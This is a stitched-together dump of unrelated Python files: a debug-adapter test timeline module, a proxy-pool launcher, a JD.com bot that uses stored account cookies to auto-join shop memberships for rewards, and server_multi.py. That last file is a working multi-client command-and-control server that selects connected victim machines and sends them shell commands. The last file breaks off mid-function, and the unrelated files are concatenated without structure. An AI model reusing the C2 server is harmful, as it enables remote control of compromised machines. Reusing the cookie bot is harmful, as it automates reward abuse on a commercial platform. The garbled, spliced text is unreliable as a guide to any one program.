"Use >> to sequence an expectation against an occurrence to establish a lower bound, "
"or wait_for_next() to wait for the next expectation since the timeline was last "
"frozen, or wait_until_realized() when a lower bound is really not necessary."
)
if explain:
log.info("Waiting for {0!r}", expectation)
return self._wait_until_realized(expectation, freeze, explain=explain)
def wait_for_next(self, expectation, freeze=True, explain=True, observe=True):
if explain:
log.info("Waiting for next {0!r}", expectation)
return self._wait_until_realized(
self._proceeding_from >> expectation, freeze, explain, observe
)
def new(self):
self.expect_frozen()
first_new = self._proceeding_from.next
if first_new is not None:
return self[first_new:]
else:
return self[self.last : self.last]
def proceed(self):
self.expect_frozen()
self.new().expect_no_unobserved()
self._proceeding_from = self.last
self.unfreeze()
def _expect_realized(self, expectation, first, explain=True, observe=True):
self.expect_frozen()
try:
reasons = next(expectation.test(first, self.last))
except StopIteration:
log.info("No matching {0!r}", expectation)
occurrences = list(first.and_following())
log.info("Occurrences considered: {0!r}", occurrences)
raise AssertionError("Expectation not matched")
occs = tuple(reasons.values())
assert occs
if observe:
self.observe(*occs)
if explain:
self._explain_how_realized(expectation, reasons)
return occs if len(occs) > 1 else occs[0]
def expect_realized(self, expectation, explain=True, observe=True):
return self._expect_realized(expectation, self.beginning, explain, observe)
def expect_new(self, expectation, explain=True, observe=True):
assert (
self._proceeding_from.next is not None
), "No new occurrences since last proceed()"
return self._expect_realized(
expectation, self._proceeding_from.next, explain, observe
)
def expect_not_realized(self, expectation):
self.expect_frozen()
assert expectation not in self
def expect_no_new(self, expectation):
self.expect_frozen()
assert expectation not in self.new()
def _explain_how_realized(self, expectation, reasons):
message = fmt("Realized {0!r}", expectation)
# For the breakdown, we want to skip any expectations that were exact occurrences,
        # since there's no point explaining that an occurrence was realized by itself.
skip = [exp for exp in reasons.keys() if isinstance(exp, Occurrence)]
for exp in skip:
reasons.pop(exp, None)
if reasons == {expectation: some.object}:
# If there's only one expectation left to explain, and it's the top-level
# one, then we have already printed it, so just add the explanation.
reason = reasons[expectation]
if "\n" in message:
message += fmt(" == {0!r}", reason)
else:
message += fmt("\n == {0!r}", reason)
elif reasons:
# Otherwise, break it down expectation by expectation.
message += ":"
for exp, reason in reasons.items():
message += fmt("\n\n where {0!r}\n == {1!r}", exp, reason)
else:
message += "."
log.info("{0}", message)
def _record(self, occurrence, block=True):
assert isinstance(occurrence, Occurrence)
assert occurrence.timeline is None
assert occurrence.timestamp is None
assert (
not self.is_final
), "Trying to record a new occurrence in a finalized timeline"
self._record_queue.put(occurrence, block=block)
if block:
self._record_queue.join()
return occurrence
def _recorder_worker(self):
while True:
occ = self._record_queue.get()
if occ is None:
self._record_queue.task_done()
break
self._accepting_new.wait()
with self._recorded_new:
occ.timeline = self
occ.timestamp = timestamp.current()
occ.index = next(self._index_iter)
if self._last is None:
self._beginning = occ
self._last = occ
else:
assert self._last.timestamp <= occ.timestamp
occ.previous = self._last
self._last._next = occ
self._last = occ
self._recorded_new.notify_all()
self._record_queue.task_done()
for exp, callback in tuple(self._listeners):
if exp == occ:
callback(occ)
def mark(self, id, block=True):
occ = Occurrence("mark", id)
occ.id = id
occ.observed = True
return self._record(occ, block)
def record_event(self, message, block=True):
occ = EventOccurrence(message)
return self._record(occ, block)
def record_request(self, message, block=True):
occ = RequestOccurrence(message)
occ.observed = True
return self._record(occ, block)
def record_response(self, request_occ, message, block=True):
occ = ResponseOccurrence(request_occ, message)
return self._record(occ, block)
def when(self, expectation, callback):
"""For every occurrence recorded after this call, invokes callback(occurrence)
if occurrence == expectation.
"""
self._listeners.append((expectation, callback))
def _snapshot(self):
last = self._last
occ = self._beginning
while True:
yield occ
if occ is last:
break
occ = occ._next
def __repr__(self):
return "|" + " >> ".join(repr(occ) for occ in self._snapshot()) + "|"
def __str__(self):
return "Timeline-" + self.name
class Interval(tuple):
def __new__(cls, timeline, start, stop):
assert start is None or isinstance(start, Expectation)
assert stop is None or isinstance(stop, Expectation)
if not isinstance(stop, Occurrence):
timeline.expect_frozen()
occs = ()
if start is None:
start = timeline._beginning
for occ in start.and_following(up_to=stop):
if occ == stop:
break
if occ == start:
occs = occ.and_following(up_to=stop)
break
result = super(Interval, cls).__new__(cls, occs)
result.timeline = timeline
result.start = start
result.stop = stop
return result
def __contains__(self, expectation):
return any(expectation.test(self[0], self[-1])) if len(self) > 0 else False
def all_occurrences_of(self, expectation):
return tuple(occ for occ in self if occ == expectation)
def expect_no_unobserved(self):
if not self:
return
unobserved = [
occ
for occ in self
if not occ.observed
and all(exp != occ for exp in self.timeline.ignore_unobserved)
]
if not unobserved:
return
raise log.error(
"Unobserved occurrences detected:\n\n{0}\n\nignoring unobserved:\n\n{1}",
"\n\n".join(repr(occ) for occ in unobserved),
"\n\n".join(repr(exp) for exp in self.timeline.ignore_unobserved),
)
class Expectation(object):
timeline = None
has_lower_bound = False
def test(self, first, last):
raise NotImplementedError()
def wait(self, freeze=None, explain=True):
assert (
self.timeline is not None
), "Expectation must be bound to a timeline to be waited on."
return self.timeline.wait_for(self, freeze, explain)
def wait_until_realized(self, freeze=None):
return self.timeline.wait_until_realized(self, freeze)
def __eq__(self, other):
if self is other:
return True
elif isinstance(other, Occurrence) and any(self.test(other, other)):
return True
else:
return NotImplemented
def __ne__(self, other):
return not self == other
def after(self, other):
return SequencedExpectation(other, self)
def when(self, condition):
return ConditionalExpectation(self, condition)
def __rshift__(self, other):
return self if other is None else other.after(self)
def __and__(self, other):
assert isinstance(other, Expectation)
return AndExpectation(self, other)
def __or__(self, other):
assert isinstance(other, Expectation)
return OrExpectation(self, other)
def __xor__(self, other):
assert isinstance(other, Expectation)
return XorExpectation(self, other)
def __hash__(self):
return hash(id(self))
def __repr__(self):
raise NotImplementedError
class DerivativeExpectation(Expectation):
def __init__(self, *expectations):
self.expectations = expectations
assert len(expectations) > 0
assert all(isinstance(exp, Expectation) for exp in expectations)
timelines = {id(exp.timeline): exp.timeline for exp in expectations}
timelines.pop(id(None), None)
if len(timelines) > 1:
offending_expectations = ""
for tl_id, tl in timelines.items():
offending_expectations += fmt("\n {0}: {1!r}\n", tl_id, tl)
raise log.error(
"Cannot mix expectations from multiple timelines:\n{0}",
offending_expectations,
)
for tl in timelines.values():
self.timeline = tl
@property
def has_lower_bound(self):
return all(exp.has_lower_bound for exp in self.expectations)
def flatten(self):
"""Flattens nested expectation chains.
If self is of type E, and given an expectation like::
E(E(e1, E(e2, e3)), E(E(e4, e5), E(e6)))
flatten() produces an iterator over::
e1, e2, e3, e4, e5, e6
"""
for exp in self.expectations:
if type(exp) is type(self):
for exp in exp.flatten():
yield exp
else:
yield exp
def describe(self, newline):
"""Returns an iterator describing this expectation. This method is used
to implement repr().
For every yielded _INDENT and _DEDENT, a newline and the appropriate amount
of spaces for correct indentation at the current level is added to the repr.
For every yielded Expectation, describe() is invoked recursively.
        For every other yielded value, str(value) is added to the repr.
newline is set to either "" or "\n", depending on whether the repr must be
single-line or multiline. Implementations of describe() should use it in
lieu of raw "\n" insofar as possible; however, repr() will automatically
fall back to multiline mode if "\n" occurs in single-line mode.
The default implementation produces a description that looks like::
(e1 OP e2 OP e3 OP ...)
where OP is the value of self.OPERATOR.
"""
op = self.OPERATOR
yield "("
yield _INDENT
first = True
for exp in self.flatten():
if first:
first = False
else:
yield " " + op + " "
yield newline
yield exp
yield _DEDENT
yield ")"
def __repr__(self):
def indent():
return indent.level * " " if newline else ""
def recurse(exp):
for item in exp.describe(newline):
if isinstance(item, DerivativeExpectation):
recurse(item)
elif item is _INDENT:
indent.level += 1
result.append(newline + indent())
elif item is _DEDENT:
assert indent.level > 0, "_DEDENT without matching _INDENT"
indent.level -= 1
result.append(newline + indent())
else:
item = str(item).replace("\n", "\n" + indent())
result.append(item)
# Try single-line repr first.
indent.level = 0
newline = ""
result = []
recurse(self)
s = "".join(result)
if len(s) <= SINGLE_LINE_REPR_LIMIT and "\n" not in s:
return s
# If it was too long, or had newlines anyway, fall back to multiline.
assert indent.level == 0
newline = "\n"
result[:] = []
recurse(self)
return "".join(result)
class SequencedExpectation(DerivativeExpectation):
OPERATOR = ">>"
def __init__(self, first, second):
super(SequencedExpectation, self).__init__(first, second)
@property
def first(self):
return self.expectations[0]
@property
def second(self):
return self.expectations[1]
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
for first_reasons in self.first.test(first, last):
first_occs = first_reasons.values()
lower_bound = latest_of(first_occs).next
if lower_bound is not None:
for second_reasons in self.second.test(lower_bound, last):
reasons = second_reasons.copy()
reasons.update(first_reasons)
yield reasons
@property
def has_lower_bound(self):
return self.first.has_lower_bound or self.second.has_lower_bound
class OrExpectation(DerivativeExpectation):
OPERATOR = "|"
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
for exp in self.expectations:
for reasons in exp.test(first, last):
yield reasons
def __or__(self, other):
assert isinstance(other, Expectation)
return OrExpectation(*(self.expectations + (other,)))
class AndExpectation(DerivativeExpectation):
OPERATOR = "&"
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
if len(self.expectations) <= 1:
for exp in self.expectations:
for reasons in exp.test(first, last):
yield reasons
return
lhs = self.expectations[0]
rhs = AndExpectation(*self.expectations[1:])
for lhs_reasons in lhs.test(first, last):
for rhs_reasons in rhs.test(first, last):
reasons = lhs_reasons.copy()
reasons.update(rhs_reasons)
yield reasons
@property
def has_lower_bound(self):
return any(exp.has_lower_bound for exp in self.expectations)
def __and__(self, other):
assert isinstance(other, Expectation)
return AndExpectation(*(self.expectations + (other,)))
def __repr__(self):
return "(" + " & ".join(repr(exp) for exp in self.expectations) + ")"
class XorExpectation(DerivativeExpectation):
OPERATOR = "^"
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
reasons = None
for exp in self.expectations:
for exp_reasons in exp.test(first, last):
if reasons is None:
reasons = exp_reasons
else:
return
if reasons is not None:
yield reasons
@property
def has_lower_bound(self):
return all(exp.has_lower_bound for exp in self.expectations)
def __xor__(self, other):
assert isinstance(other, Expectation)
return XorExpectation(*(self.expectations + (other,)))
class ConditionalExpectation(DerivativeExpectation):
def __init__(self, expectation, condition):
self.condition = condition
super(ConditionalExpectation, self).__init__(expectation)
@property
def expectation(self):
return self.expectations[0]
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
for reasons in self.expectation.test(first, last):
occs = reasons.values()
if self.condition(*occs):
yield reasons
def describe(self, newline):
yield "?"
yield self.expectation
class PatternExpectation(Expectation):
def __init__(self, *circumstances):
self.circumstances = circumstances
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
for occ in first.and_following(up_to=last, inclusive=True):
if occ.circumstances == self.circumstances:
yield {self: occ}
def describe(self):
rest = repr(self.circumstances[1:])
if rest.endswith(",)"):
rest = rest[:-2] + ")"
return fmt("<{0}{1}>", self.circumstances[0], rest)
def __repr__(self):
return self.describe()
def Mark(id):
return PatternExpectation("mark", id)
def _describe_message(message_type, *items):
items = (("type", message_type),) + items
d = collections.OrderedDict(items)
# Keep it all on one line if it's short enough, but indent longer ones.
for format_string in "{0!j:indent=None}", "{0!j}":
s = fmt(format_string, d)
s = "{..., " + s[1:]
# Used by some.dict.containing to inject ... as needed.
s = s.replace('"\\u0002...": "...\\u0003"', "...")
# Used by some.* and by Event/Request/Response expectations below.
s = s.replace('"\\u0002', "")
s = s.replace('\\u0003"', "")
if len(s) <= SINGLE_LINE_REPR_LIMIT:
break
return s
def Event(event, body=some.object):
exp = PatternExpectation("event", event, body)
items = (("event", event),)
if body is some.object:
items += (("\002...", "...\003"),)
else:
items += (("body", body),)
exp.describe = lambda: _describe_message("event", *items)
return exp
def Request(command, arguments=some.object):
exp = PatternExpectation("request", command, arguments)
items = (("command", command),)
if arguments is some.object:
items += (("\002...", "...\003"),)
else:
items += (("arguments", arguments),)
exp.describe = lambda: _describe_message("request", *items)
return exp
def Response(request, body=some.object):
assert isinstance(request, Expectation) or isinstance(request, RequestOccurrence)
exp = PatternExpectation("response", request, body)
exp.timeline = request.timeline
exp.has_lower_bound = request.has_lower_bound
# Try to be as specific as possible.
if isinstance(request, Expectation):
if request.circumstances[0] != "request":
exp.describe = lambda: fmt("response to {0!r}", request)
            return exp
else:
items = (("command", request.circumstances[1]),)
else:
items = (("command", request.command),)
if isinstance(request, Occurrence):
items += (("request_seq", request.seq),)
if body is some.object:
items += (("\002...", "...\003"),)
elif body is some.error or body == some.error:
items += (("success", False),)
if body == some.error:
items += (("message", compat.force_str(body)),)
else:
items += (("body", body),)
exp.describe = lambda: _describe_message("response", *items)
return exp
class Occurrence(Expectation):
has_lower_bound = True
def __init__(self, *circumstances):
assert circumstances
self.circumstances = circumstances
self.timeline = None
self.timestamp = None
self.index = None
self.previous = None
self._next = None
self.observed = False
@property
def next(self):
if self.timeline is None:
return None
with self.timeline.frozen():
was_last = self is self.timeline.last
occ = self._next
if was_last:
# The .next property of the last occurrence in a timeline can change
# at any moment when timeline isn't frozen. So if it wasn't frozen by
# the caller, this was an unsafe operation, and we should complain.
self.timeline.expect_frozen()
return occ
def preceding(self):
it = self.and_preceding()
next(it)
return it
def and_preceding(self, up_to=None, inclusive=False):
assert self.timeline is not None
assert up_to is None or isinstance(up_to, Expectation)
if isinstance(up_to, Occurrence) and self < up_to:
return
occ = self
while occ != up_to:
yield occ
occ = occ.previous
if inclusive:
yield occ
def following(self):
it = self.and_following()
next(it)
return it
def and_following(self, up_to=None, inclusive=False):
assert self.timeline is not None
assert up_to is None or isinstance(up_to, Expectation)
if up_to is None:
self.timeline.expect_frozen()
if isinstance(up_to, Occurrence) and up_to < self:
return
occ = self
while occ != up_to:
yield occ
occ = occ.next
if inclusive:
yield occ
def precedes(self, occurrence):
assert isinstance(occurrence, Occurrence)
return any(occ is self for occ in occurrence.preceding())
def follows(self, occurrence):
return occurrence.precedes(self)
def realizes(self, expectation):
assert isinstance(expectation, Expectation)
return expectation == self
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
for occ in first.and_following(up_to=last, inclusive=True):
if occ is self:
yield {self: self}
def __lt__(self, occurrence):
return self.precedes(occurrence)
def __gt__(self, occurrence):
return occurrence.precedes(self)
def __le__(self, occurrence):
return self is occurrence or self < occurrence
def __ge__(self, occurrence):
return self is occurrence or self > occurrence
def __rshift__(self, expectation):
assert isinstance(expectation, Expectation)
return expectation.after(self)
def __hash__(self):
return hash(id(self))
def __repr__(self):
return fmt(
"{2}{0}.{1}",
self.index,
self.describe_circumstances(),
"" if self.observed else "*",
)
def describe_circumstances(self):
rest = repr(self.circumstances[1:])
if rest.endswith(",)"):
rest = rest[:-2] + ")"
return fmt("{0}{1}", self.circumstances[0], rest)
class MessageOccurrence(Occurrence):
"""An occurrence representing a DAP message (event, request, or response).
Its circumstances == (self.TYPE, self._key, self._data).
"""
TYPE = None
"""Used for self.circumstances[0].
Must be defined by subclasses.
"""
def __init__(self, message):
assert self.TYPE
assert isinstance(message, messaging.Message)
# Assign message first for the benefit of self._data in child classes.
self.message = message
super(MessageOccurrence, self).__init__(self.TYPE, self._key, self._data)
@property
def seq(self):
return self.message.seq
@property
def _key(self):
"""The part of the message that describes it in general terms - e.g. for
an event, it's the name of the event.
"""
raise NotImplementedError
@property
def _data(self):
"""The part of the message that is used for matching expectations, excluding
self._key.
"""
raise NotImplementedError
@property
def _id(self):
"""The part of the message that is necessary and sufficient to uniquely
identify it. Used for __repr__().
Must be an ordered list of key-value tuples, suitable for OrderedDict().
"""
return [("seq", self.message.seq), ("type", self.TYPE)]
def __call__(self, *args, **kwargs):
return self.message(*args, **kwargs)
def describe_circumstances(self):
id = collections.OrderedDict(self._id)
# Keep it all on one line if it's short enough, but indent longer ones.
s = fmt("{0!j:indent=None}", id)
if len(s) > SINGLE_LINE_REPR_LIMIT:
s = fmt("{0!j}", id)
return s
# For messages, we don't want to include their index, because they already have
# "seq" to identify them uniquely, and including both is confusing.
def __repr__(self):
return ("" if self.observed else "*") + self.describe_circumstances()
class EventOccurrence(MessageOccurrence):
TYPE = "event"
def __init__(self, message):
assert isinstance(message, messaging.Event)
super(EventOccurrence, self).__init__(message)
@property
def event(self):
return self.message.event
@property
def body(self):
return self.message.body
@property
def _key(self):
return self.event
@property
def _data(self):
return self.body
@property
def _id(self):
return super(EventOccurrence, self)._id + [("event", self.message.event)]
class RequestOccurrence(MessageOccurrence):
TYPE = "request"
def __init__(self, message):
assert isinstance(message, messaging.Request)
super(RequestOccurrence, self).__init__(message)
self.response = None
if isinstance(message, messaging.OutgoingRequest):
self.on_response = message.on_response
@property
def command(self):
return self.message.command
@property
def arguments(self):
return self.message.arguments
@property
def _key(self):
return self.command
@property
def _data(self):
return self.arguments
@property
def _id(self):
return super(RequestOccurrence, self)._id + [("command", self.message.command)]
def wait_for_response(self, freeze=True, raise_if_failed=True):
response = Response(self, some.object).wait_until_realized(freeze)
assert response.observed
if raise_if_failed and not response.success:
raise response.body
else:
return response
class ResponseOccurrence(MessageOccurrence):
TYPE = "response"
def __init__(self, request_occ, message):
assert isinstance(request_occ, RequestOccurrence)
assert isinstance(message, messaging.Response)
# Assign request first for the benefit of self._key.
self.request = request_occ
request_occ.response = self
super(ResponseOccurrence, self).__init__(message)
@property
def body(self):
return self.message.body
@property
def result(self):
return self.message.result
@property
def success(self):
return self.message.success
@property
def _key(self):
return self.request
@property
def _data(self):
return self.body
@property
def _id(self):
return super(ResponseOccurrence, self)._id + [
("command", self.message.request.command),
("request_seq", self.message.request.seq),
]
def causing(self, *expectations):
for exp in expectations:
(self >> exp).wait()
return self
def earliest_of(occurrences):
return min(occurrences, key=lambda occ: occ.index)
def latest_of(occurrences):
return max(occurrences, key=lambda occ: occ.index)
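# Illustrative sketch, not part of the original module: the minimal lifecycle
# of a Timeline using only mark() and expectation composition; the mark ids
# are made up.
def _timeline_usage_sketch():
    tl = Timeline("sketch")
    first = tl.mark("first")
    second = tl.mark("second")
    with tl.frozen():
        assert second.follows(first)
        # Occurrence >> Expectation builds a SequencedExpectation; `in` tests
        # whether it is realized anywhere in the frozen timeline.
        assert (first >> Mark("second")) in tl
    tl.finalize()
    tl.close()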
|
main.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: main.py
   Description : run the main function
Author : JHao
date: 2017/4/1
-------------------------------------------------
Change Activity:
2017/4/1:
-------------------------------------------------
"""
__author__ = 'JHao'
import sys
from multiprocessing import Process
sys.path.append('.')
sys.path.append('..')
from Api.ProxyApi import run as ProxyApiRun
from Schedule.ProxyValidSchedule import run as ValidRun
from Schedule.ProxyRefreshSchedule import run as RefreshRun
def run():
p_list = list()
    p1 = Process(target=ProxyApiRun, name='ProxyApiRun')  # API server
    p_list.append(p1)
    p2 = Process(target=ValidRun, name='ValidRun')  # periodically re-validate useful_proxy
    p_list.append(p2)
    p3 = Process(target=RefreshRun, name='RefreshRun')  # fetch new proxies + batch refresh
    p_list.append(p3)
for p in p_list:
p.daemon = True
p.start()
for p in p_list:
p.join()
if __name__ == '__main__':
run()
|
main.py
|
import atexit
import os
import re
import sys
import threading
import time
import traceback
import yaml
import requests
import datetime
@atexit.register
def _end():
end_time = time.time()
print(to_log("INFO", "执行结束", "执行耗时{:.3f}s".format(end_time - start_time)))
def get_shopid():
"""
    Fetch the shop id list; if the online copy's update time is earlier than the local copy's, use the local one, otherwise use the online copy.
"""
    net_res = None
    try:
        net_res = requests.get(CONFIG['shop_id_url'], timeout=30)
        if net_res.status_code != 200:
            raise Exception
    except:
        net_res = None
        print(to_log("ERROR", "Failed to fetch the online shopid list"))
    res = None
    if os.path.exists(get_file_path("shopid.yaml")):
        try:
            res = yaml.safe_load(open(get_file_path("shopid.yaml"), "r", encoding="utf-8"))
        except:
            os.remove(get_file_path("shopid.yaml"))
            print(to_log("ERROR", "shopid.yaml is corrupted", "The corrupted file has been removed, please run again"))
            sys.exit()
    if net_res is not None:
        try:
            # Use the online copy when there is no local copy, or when the
            # online copy is newer than the local one.
            if res is None or (datetime.datetime.strptime(str(yaml.safe_load(net_res.text)['update_time']),
                                                          '%Y-%m-%d') - datetime.datetime.strptime(str(res['update_time']),
                                                                                                   '%Y-%m-%d')).days > 0:
                print(to_log("INFO", "shopid list updated"))
                res = yaml.safe_load(net_res.text)
                open(get_file_path("shopid.yaml"), "w", encoding="utf-8").write(net_res.text)
        except:
            pass
    if res is None:
        return False, None
    print(to_log("INFO", "shopid update time", str(res['update_time'])))
    return True, res['shop_id']
def get_timestamp():
"""
    Return the current timestamp in milliseconds, as a string.
:return:
"""
return str(int(time.time() * 1000))
def get_file_path(file_name=""):
"""
    Return the absolute path of a file, to avoid errors in some run environments.
    :param file_name: file name
:return:
"""
return os.path.join(os.path.split(sys.argv[0])[0], file_name)
def to_log(info_type="", title="", info=""):
"""
    :param info_type: log level
    :param title: log title
    :param info: log message
:return:
"""
if not os.path.exists(get_file_path("logs")):
os.mkdir(get_file_path("logs/"))
now = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
log = now + " " + info_type + " " + title + " " + info
with open(get_file_path("logs/jdbm.log"), "a", encoding="utf-8") as log_a_file_io:
log_a_file_io.write(log + "\n")
return log
def get_headers(cookie, host):
"""
    Build the request headers.
:param cookie:
:param host:
:return:
"""
return {
"Cookie": cookie,
"Host": host,
"Referer": "https://m.jd.com",
"User-Agent": CONFIG['user-agent'][0]
}
def get_user_info(cookie):
"""
    Fetch the user's account info.
    :type cookie: str
    :return: bool: success, str: nickname, str: the user's JD bean balance
"""
try:
url = "https://me-api.jd.com/user_new/info/GetJDUserInfoUnion"
res = requests.get(url, headers=get_headers(cookie, "me-api.jd.com"), verify=False)
if res.status_code == 200 and res.json()["msg"] == "success":
return True, res.json()["data"]["userInfo"]["baseInfo"]["nickname"], res.json()["data"]["assetInfo"][
"beanNum"]
else:
return False, None, None
except:
to_log("ERROR", "获取用户信息错误", traceback.format_exc())
return False, None, None
def get_venderId(shop_id):
"""
    Convert a `shop_id` into a `venderId`.
    :param shop_id:
    :return: bool: success, str: venderId
"""
try:
res = requests.get("https://shop.m.jd.com/?shopId=" + str(shop_id), verify=False)
_res = re.compile("venderId: '(\\d*)'").findall(res.text)
if res.status_code == 200 and len(_res):
return True, re.compile("venderId: '(\\d*)'").findall(res.text)[0]
else:
            # TODO: handle the case where no venderId can be obtained
            return False, None
    except:
        to_log("ERROR", "Failed to fetch venderId", traceback.format_exc())
return False, None
def get_shop_open_card_info(cookie, shop_id):
"""
获取店铺会员信息
:param cookie:
:param shop_id:
:return: bool: 是否成功, str: 奖励名称, str: 奖励数量, str: activityId
"""
try:
status, venderId = get_venderId(shop_id)
if not status:
return False, None, None, None
params = {
"appid": "jd_shop_member",
"functionId": "getShopOpenCardInfo",
"body": '{"venderId":"' + venderId + '","channel":406}',
"client": "H5",
"clientVersion": "9.2.0",
"uuid": "88888"
}
host = "api.m.jd.com"
url = "https://api.m.jd.com/client.action"
res = requests.get(url, params=params, headers=get_headers(cookie, host), verify=False)
if res.status_code == 200 and res.json()['success']:
if not res.json()['result']['userInfo']['openCardStatus'] and res.json()['result']['interestsRuleList'] \
is not None:
for interests_info in res.json()['result']['interestsRuleList']:
if interests_info['prizeName'] == "京豆":
process[1] += int(interests_info['discountString'])
return True, interests_info['prizeName'], interests_info['discountString'], \
interests_info['interestsInfo']['activityId']
elif interests_info['prizeName'] == "元红包":
process[2] += int(interests_info['discountString'])
return True, interests_info['prizeName'], interests_info['discountString'], \
interests_info['interestsInfo']['activityId']
return False, None, None, None
except:
print(to_log("ERROR", "获取店铺信息错误", traceback.format_exc()))
return False, None, None, None
def bind_with_vender(cookie, shop_id, activity_id):
"""
入会
:param cookie: 用户cookie
:param shop_id: 店铺 id
:param activity_id: 活动 id 重要!(如果没有这个就不能获得奖励)
:return:
"""
try:
status, venderId = get_venderId(shop_id)
if not status:
return False
        # Change these settings in config.yaml
params = {
"appid": "jd_shop_member",
"functionId": "bindWithVender",
"body": '{"venderId":"' + venderId + '","shopId":"' + str(
shop_id) + '","bindByVerifyCodeFlag":1,"registerExtend":{"v_sex":"' + CONFIG['register'][
'v_sex'] + '","v_birthday":"' + str(CONFIG['register']['v_birthday']) + '","v_name":"' +
CONFIG['register']['v_name'] + '"},"writeChildFlag":0,"activityId":' + str(
activity_id) + ',"channel":406}',
"client": "H5",
"clientVersion": "9.2.0",
"uuid": "88888"
}
host = "api.m.jd.com"
url = "https://api.m.jd.com/client.action"
res = requests.get(url, params=params, headers=get_headers(cookie, host), verify=False)
# TODO:
# {"code":0,"success":true,"busiCode":"210","message":"您的账户已经是本店会员","result":null}
# {"code":0,"success":true,"busiCode":"0","message":"加入店铺会员成功","result":{"headLine":"您已成功加入店铺会员","giftInfo":null,"interactActivityDTO":null}}
if res.json()["success"] and res.json()["result"]["giftInfo"] is not None:
return True
else:
            # TODO: log the cases where joining did not succeed
            return False
    except:
        to_log("ERROR", "Failed to join membership", traceback.format_exc())
return False
def bind(cookie, thread):
global process
for _ in shop_id_list[thread::CONFIG['thread']]:
status, prize_name, discount, activity_id = get_shop_open_card_info(cookie, _)
process[0] += 1
if status:
            # Filter criteria
if prize_name == "京豆" and int(discount) < CONFIG['screening']['bean']:
return
if prize_name == "元红包" and not CONFIG['screening']['voucher']:
return
if bind_with_vender(cookie, _, activity_id):
print(to_log("INFO", "开卡成功", "在" + str(_) + "获得 " + str(discount) + prize_name))
def main():
try:
global process
for _ in CONFIG['cookies']:
process = [0, 0, 0]
status, username, bean_num = get_user_info(_)
if status:
print(to_log("INFO", "账号名称: " + str(username) + " 现有京豆数量: " + str(bean_num)))
for thread in range(CONFIG['thread']):
# xxx(cookie=_, shop_id_list=shop_id_list, thread=thread)
threading.Thread(target=bind, args=(_, thread,)).start()
while threading.active_count() != 1:
print("\r 账号:{}, 已尝试{}个店铺,获得{}京豆和{}元红包".format(username, process[0], process[1], process[2]),
end="")
time.sleep(0.5)
else:
print(to_log("ERROR", "cookie失效", _[-15:]))
print(to_log("INFO", "账号{}".format(username),
"共尝试{}个店铺,共获得{}京豆和{}元红包\n".format(process[0], process[1], process[2])))
except:
print(to_log("ERROR", "运行错误", "在" + traceback.format_exc()))
if __name__ == '__main__':
start_time = time.time()
    # Suppress warnings
    requests.packages.urllib3.disable_warnings()
    if not os.path.exists(get_file_path("config.yaml")):
        print(to_log("ERROR", "Config file `config.yaml` not found", "See https://github.com/AntonVanke/JDBrandMember"))
sys.exit()
CONFIG = yaml.safe_load(open(get_file_path("config.yaml"), "r", encoding="utf-8"))
process = [0, 0, 0]
    # Fetch the shopid list
    shopid_status, shop_id_list = get_shopid()
    if not shopid_status:
        print(to_log("ERROR", "Required shopid file not found", "See https://github.com/AntonVanke/JDBrandMember"))
sys.exit()
main()
|
server_multi.py
|
import socket
import sys
import threading
import time
from queue import Queue
NUMBER_OF_THREADS = 2
JOB_NUMBER = [1, 2]
queue = Queue()
all_connections = []
all_addressess = []
# Create a socket (connects two computers)
def create_socket():
try:
global host
global port
global s
host = ''
port = 9998
s = socket.socket()
except socket.error as msg:
print("Socket execution created error {}".format(msg))
# Binding the socket and listening for connection
def bind_socket():
try:
global host
global port
global s
print("Binding the Port: {}".format(port))
s.bind((host,port))
s.listen(5)
except socket.error as msg:
print("Socket Binding error {} '\n' Retrying .....".format(msg))
bind_socket()
# Handle connections from multiple clients and save them to a list
# Close previous connections when the server.py file is restarted
def accepting_connections():
for c in all_connections:
c.close()
del all_connections[:]
del all_addressess[:]
while True:
try:
conn, address = s.accept()
s.setblocking(1) # Prevent Timeout
all_addressess.append(address)
all_connections.append(conn)
print("Connection has been esablished! IP : {0} | PORT : {1}".format(address[0],str(address[1])))
except:
print("Error accepting connection")
continue
# Second thread functions: 1) list all clients 2) select a client 3) send commands to the connected client
def start_ghost():
while True:
cmd = input("Ghost> ")
if cmd == 'list':
list_connections()
elif 'select' in cmd:
conn = get_target(cmd)
if conn is not None:
send_target_commands(conn)
# elif cmd == 'quit':
# print("Ghost going offline")
# sys.exit(0)
# break
else:
print("Command not recognised")
# Display all active connections with clients
def list_connections():
    results = ""
    for i, conn in enumerate(all_connections):
        try:
            conn.send(str.encode(" "))
            conn.recv(2014780)
        except:
            del all_connections[i]
            del all_addressess[i]
            continue
        results += str(i) + " IP: " + str(all_addressess[i][0]) + " PORT: " + str(all_addressess[i][1]) + "\n"
    print("***********Clients***********\n" + results)
# Selecting the target
def get_target(cmd):
    try:
        target = cmd.replace("select", "")
        target = int(target.replace(" ", ""))
        conn = all_connections[target]
        print("You are now connected to IP: {0} | PORT: {1}".format(str(all_addressess[target][0]), str(all_addressess[target][1])))
        print(str(all_addressess[target][0]) + "> ", end="")
        return conn
    except:
        print("Selection not valid")
        return None
def send_target_commands(conn):
while True:
try:
cmd = input()
if cmd == "quit":
conn.close()
s.close()
sys.exit()
if len(str.encode(cmd)) > 0:
conn.send(str.encode(cmd))
client_resp = str(conn.recv(20480),"utf-8")
print("Client Response {}".format(client_resp),end="")
except:
print("Error sending command")
break
# Create worker threads
def create_workers():
    for _ in range(NUMBER_OF_THREADS):
        t = threading.Thread(target=work)  # each worker runs the work() loop
        t.daemon = True  # daemon threads do not block interpreter exit
        t.start()
# Do the next job that is in the queue
def work():
while True:
x = queue.get()
if x == 1:
create_socket()
bind_socket()
            accepting_connections()
if x == 2:
start_ghost()
queue.task_done()
def create_jobs():
for j in JOB_NUMBER:
queue.put(j)
queue.join()
create_workers()
create_jobs()
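# Minimal sketch (not part of the original script) of the same queue-driven
# worker pattern in isolation: daemon workers pull jobs from a Queue and call
# task_done() so that queue.join() can unblock once every job is processed.
def worker_pattern_sketch(job_count=4, worker_count=2):
    jobs = Queue()
    def handle():
        while True:
            job = jobs.get()
            print("handling job", job)
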